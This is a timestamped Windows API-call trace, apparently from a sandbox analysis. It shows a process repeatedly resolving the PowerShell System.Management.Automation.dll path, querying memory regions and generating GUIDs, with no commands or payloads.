[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] VirtualQuery (in: lpAddress=0x10b8f0, lpBuffer=0x10c7b0, dwLength=0x30 | out: lpBuffer=0x10c7b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.858] VirtualQuery (in: lpAddress=0x10b8f0, lpBuffer=0x10c7b0, dwLength=0x30 | out: lpBuffer=0x10c7b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.858] VirtualQuery (in: lpAddress=0x10afe0, lpBuffer=0x10bea0, dwLength=0x30 | out: lpBuffer=0x10bea0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.858] VirtualQuery (in: lpAddress=0x10b070, lpBuffer=0x10bf30, dwLength=0x30 | out: lpBuffer=0x10bf30*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.858] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.858] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.859] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.859] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.859] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.859] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.859] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.859] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.860] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.860] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.860] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.860] VirtualQuery (in: lpAddress=0x10b420, lpBuffer=0x10c2e0, dwLength=0x30 | out: lpBuffer=0x10c2e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.860] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.860] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.861] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.861] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.861] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x5f36ff8d, Data2=0xc9c7, Data3=0x47f5, Data4=([0]=0x85, [1]=0x34, [2]=0x4e, [3]=0x4a, [4]=0x24, [5]=0x39, [6]=0x73, [7]=0x59))) returned 0x0
[0079.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.862] VirtualQuery (in: lpAddress=0x10afe0, lpBuffer=0x10bea0, dwLength=0x30 | out: lpBuffer=0x10bea0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.862] VirtualQuery (in: lpAddress=0x10b070, lpBuffer=0x10bf30, dwLength=0x30 | out: lpBuffer=0x10bf30*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.863] VirtualQuery (in: lpAddress=0x10b290, lpBuffer=0x10c150, dwLength=0x30 | out: lpBuffer=0x10c150*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.863] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x4958d7c0, Data2=0x2201, Data3=0x4301, Data4=([0]=0x8f, [1]=0x2, [2]=0x9d, [3]=0xa9, [4]=0x75, [5]=0x22, [6]=0x7e, [7]=0x8))) returned 0x0
[0079.863] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xa22c6633, Data2=0x559c, Data3=0x412b, Data4=([0]=0x93, [1]=0x2e, [2]=0xf9, [3]=0xb6, [4]=0x9, [5]=0x99, [6]=0x9f, [7]=0x99))) returned 0x0
[0079.864] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x9214ad3d, Data2=0xba38, Data3=0x42a7, Data4=([0]=0x92, [1]=0x15, [2]=0xf6, [3]=0x5c, [4]=0x11, [5]=0x5d, [6]=0x72, [7]=0x85))) returned 0x0
[0079.864] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x566f1ea0, Data2=0x5d49, Data3=0x4e87, Data4=([0]=0xbe, [1]=0x6c, [2]=0x13, [3]=0x93, [4]=0x2, [5]=0x2e, [6]=0xdd, [7]=0xe6))) returned 0x0
[0079.864] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xbfc37db, Data2=0x8561, Data3=0x49af, Data4=([0]=0x99, [1]=0xd1, [2]=0xd7, [3]=0x79, [4]=0x10, [5]=0x4c, [6]=0x6f, [7]=0x6a))) returned 0x0
[0079.865] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x576fa261, Data2=0x3c21, Data3=0x4313, Data4=([0]=0xb6, [1]=0xab, [2]=0x2b, [3]=0x67, [4]=0x36, [5]=0xcb, [6]=0x23, [7]=0x2b))) returned 0x0
[0079.865] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xc265afd0, Data2=0x5089, Data3=0x40d7, Data4=([0]=0x8b, [1]=0x94, [2]=0xdd, [3]=0xa7, [4]=0x74, [5]=0x66, [6]=0x6b, [7]=0x4a))) returned 0x0
[0079.865] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x1b52a646, Data2=0x11a4, Data3=0x4ef0, Data4=([0]=0xb2, [1]=0x11, [2]=0xf9, [3]=0x1a, [4]=0xfa, [5]=0x1c, [6]=0x97, [7]=0x6b))) returned 0x0
[0079.865] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.865] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.865] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.866] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.866] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.866] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.866] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.866] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.867] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.867] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.867] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.867] VirtualQuery (in: lpAddress=0x10ae50, lpBuffer=0x10bd10, dwLength=0x30 | out: lpBuffer=0x10bd10*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.867] VirtualQuery (in: lpAddress=0x10aee0, lpBuffer=0x10bda0, dwLength=0x30 | out: lpBuffer=0x10bda0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.868] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.868] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.868] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.868] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.868] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.868] VirtualQuery (in: lpAddress=0x10b750, lpBuffer=0x10c610, dwLength=0x30 | out: lpBuffer=0x10c610*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.869] VirtualQuery (in: lpAddress=0x10b7e0, lpBuffer=0x10c6a0, dwLength=0x30 | out: lpBuffer=0x10c6a0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.869] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xdde53032, Data2=0x7ee8, Data3=0x417c, Data4=([0]=0x9e, [1]=0x9f, [2]=0x3f, [3]=0x24, [4]=0xae, [5]=0x9f, [6]=0x92, [7]=0x48))) returned 0x0
[0079.869] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.869] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.869] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.869] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.869] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.870] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.870] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.870] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.870] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.870] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.871] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.871] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.871] VirtualQuery (in: lpAddress=0x10b7f0, lpBuffer=0x10c6b0, dwLength=0x30 | out: lpBuffer=0x10c6b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
